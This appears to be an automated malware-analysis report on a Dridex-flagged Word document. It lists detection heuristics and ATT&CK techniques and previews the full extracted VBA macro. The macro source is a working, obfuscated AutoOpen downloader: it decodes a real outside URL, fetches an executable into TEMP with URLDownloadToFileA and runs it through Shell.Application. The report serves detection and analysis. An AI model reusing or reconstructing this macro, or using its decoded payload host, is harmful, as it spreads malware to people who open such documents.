MALICIOUS
376
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of URLDownloadToFile and obfuscated auto-exec loaders, suggesting the macro's purpose is to download and execute a secondary payload. ClamAV detection as Doc.Trojan.Dridex-7 further supports this assessment.
Heuristics 10
-
ClamAV: Doc.Trojan.Dridex-7 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Dridex-7
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
"URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _ -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82))) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$ … -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5345 bytes |
SHA-256: 5d2083fe1fa0609a69a7dbf96641768d6d3fad7e3b373aa1b8ef6aa4ae9c792f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FUvhdsfkHJfg
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "АавпавпАА"
Public Function FhjvhjsdfksdfF(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
FhjvhjsdfksdfF = FhjvhjsdfksdfF & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function
Attribute VB_Name = "ываывААва"
#If VBA7 Then
Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
ByVal ПСрпспсппОап As String, _
ByVal ПСрпспсппОапf As String, _
ByVal ПСрпспсппОапfd As Long, _
ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
Private Declare Function гшПНШываа Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
ByVal ПСрпспсппОап As String, _
ByVal ПСрпспсппОапf As String, _
ByVal ПСрпспсппОапfd As Long, _
ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub FUvhdsfkHJfg()
рпорпАавпавп FhjvhjsdfksdfF(Chr$(104) & Chr$(40) & Chr$(116) & Chr$(69) & Chr$(116) & Chr$(83) & Chr$(112) & Chr$(86) & Chr$(58) & Chr$(104) & Chr$(47) & Chr$(50) & Chr$(47) & Chr$(40) & Chr$(99) & Chr$(96) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(63) & Chr$(101) & Chr$(75) & Chr$(110) & Chr$(112) & Chr$(101) & Chr$(127) & Chr$(46) & Chr$(107) & Chr$(100) & Chr$(68) & Chr$(101) & Chr$(59) & Chr$(47) & Chr$(60) & Chr$(106) & Chr$(57) & Chr$(115) & Chr$(66) & Chr$(47) & Chr$(37) & Chr$(98) & Chr$(51) & Chr$(105) & Chr$(64) & Chr$(110) & Chr$(96) & Chr$(46) & Chr$(48) & Chr$(101) & Chr$(46) & Chr$(120) & Chr$(77) & Chr$(101) & Chr$(58)), Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
End Sub
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
Set ываААвыаыва = CreateObject(FhjvhjsdfksdfF(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
ываААвыаыва.Open Environ(FhjvhjsdfksdfF(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & FhjvhjsdfksdfF(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.